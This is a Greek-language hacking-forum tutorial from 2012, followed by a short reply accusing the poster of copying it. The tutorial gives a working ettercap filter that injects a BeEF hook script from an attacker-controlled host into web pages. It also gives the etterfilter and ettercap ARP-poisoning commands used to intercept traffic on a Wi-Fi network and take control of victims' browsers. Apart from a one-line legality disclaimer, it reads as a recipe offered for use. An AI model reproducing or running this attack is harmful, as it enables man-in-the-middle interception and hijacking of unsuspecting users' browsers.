~Grey Hat~ Posted May 25, 2012 Posted May 25, 2012 Εισαγωγη Γεια σας και παλι!Αποφασισα να κανω εναν οδηγο με το πως μπορειτε να εισβαλεται σε εναν υπολογιστη μεσω του browser του!Προσοχη:Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο Tι θα χρειαστουμε? Μα φυσικα Βacktrack 5 και το Cross-Site-Sctript (xss) Ξεκινωντας Παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα #GreyHat if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "</head>")) { replace("</head>", "</head><script src="http://192.168.1.66/beef/hook/beefmagic.js.php"></script> "); msg("EPIASES_LAYRAKIn"); } if (search(DATA.data, "</HEAD>")) { replace("</HEAD>", "</HEAD><script src="http://192.168.1.66/beef/hook/beefmagic.js.php"></script> "); msg("epiases_layrakin"); } } Eκει που γραφει http://192.168.1.66 θα πρεπει να βαλετε την δικη σας ip. Ξεκινωντας Την Διαδικασια Μετα αφου καναμε τα παραπανω ,παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef και παταμε να ανοιξει. Μετα παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ και παταω open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ) Αλλαξτε το http://127.0.0.1/beef με την δικια σας ip πχ http://192.168.1.66/beef ,πατα apply config και finished. Τωρα για να δειτε τι κανει το beEF ακριβως μπορειτε να το δοκιμασετε σε εσας αν πατε στο view spawn zombie example και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .Πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα Και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss Υπαρχουνε παρα πολλες επιλογες οπως: Nα εισβαλετε στον υπολογιστη του,Nα τον ανακατευθυνετε σε αλλη σελιδα κτλπ. Τωρα πως κανουμε το θυμα να ενωθει μαζι μας;Ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο(terminal) και γραφουμε etterfilter /root/Desktop/xssbeef -ο xssbeef.ef Μετα μας εμφανιζει αυτο etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file '/root/Desktop/xssbeef' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'filter.ef' done. -> Script encoded into 20 instructions. Μετα γραφουμε στο τερματικο, ettercap -G μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift u επιλεγουμε wlan0 μετα ctrl s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα Τελος,παταμε ctrl w και περιμενουμε μεχρι να δουμε στο ettercap ''epiases_layraki'' οταν το δουμε αυτο παμε στο BeEF βλεπουμε οτι εχουμε zombies(χρηστες)Αν εχετε το ettercap lazarous γραψτε αυτη την εντολη στο τερματικο σας ettercap -T -M arp // // -F '/root/xssbeef.ef' -i wlan0 Θελει αρκετη δουλεια μεχρι να μαθετε να χειριζεστε καλα ολο αυτο το συστημα..Συμβουλη -- Μην το βαζετε κατω και προσπαθηστε , θα δειτε οτι στο τελος ειναι απλο! Ελπιζω να βοηθησα ευχαριστω
Audi S3 quattro Posted January 2, 2013 Posted January 2, 2013 an thes anefere kai tin pigi apo tous odigous pou bazis min tous pasaris gia dikous sou giati den einai... trelenome otan kanete copy-paste kai pasarete otidipote einai auto gia diko sas kai stin pragmatikotita den kserete pou pane ta 4. to palikari pou tous ebale exei afierosi xrono kai merika atoma to paizoun << xaker >> twra pou klidose tin selida katse grafta me to xeri
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now